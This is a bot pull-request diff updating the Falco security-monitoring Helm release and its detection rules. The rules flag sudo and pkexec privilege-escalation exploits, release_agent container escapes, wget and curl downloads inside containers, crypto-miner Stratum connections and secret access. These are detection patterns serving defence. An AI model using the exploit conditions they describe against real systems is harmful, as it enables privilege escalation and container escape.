+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all file creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
      desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i with a command-line argument that ends with a single backslash character allows an unprivileged user to elevate their privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect a file system mount inside a privileged container, which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which
+    # the use of ingress remote file copy tools in a container is expected
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    - macro: curl_download
+      condition: proc.name = curl and
+                 (proc.cmdline contains " -o " or
+                 proc.cmdline contains " --output " or
+                 proc.cmdline contains " -O " or
+                 proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detect an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64,
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
        k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule: K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
    # cluster creation. This may signify a permission setting that is too broad.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 6320f1915ef15863bce34abb7b661561e31eea40ac21fecdc5f3e35fe31c564f
+        checksum/rules: 8990fd9e100252b5d1717eea471270ca3878d0359051d00565e95fb8e4fa6aec
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

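Several of the rules touched by this update are tunable through `user_known_*` override macros that default to `(never_true)` — for example the new `user_known_mount_in_privileged_containers` macro added to the `Mount Launched in Privileged Container` rule. As a minimal sketch of how such an override could be supplied via `falco_rules.local.yaml` (the image repository below is a hypothetical placeholder, not part of the chart):

```yaml
# falco_rules.local.yaml -- loaded after falco_rules.yaml, so this
# macro definition overrides the chart's default of (never_true).
# The image name is a placeholder; substitute your own trusted image.
- macro: user_known_mount_in_privileged_containers
  condition: (container.image.repository = "registry.example.com/storage-agent")
```

With an override like this in place, the rule's `and not user_known_mount_in_privileged_containers` clause suppresses alerts for that image while leaving the rule active for everything else.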
@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.0 chore(deps): update helm release falco to v1.19.1 Jun 7, 2022
github-actions bot commented Jun 7, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.1

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. 
This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. 
\"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. 
When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. 
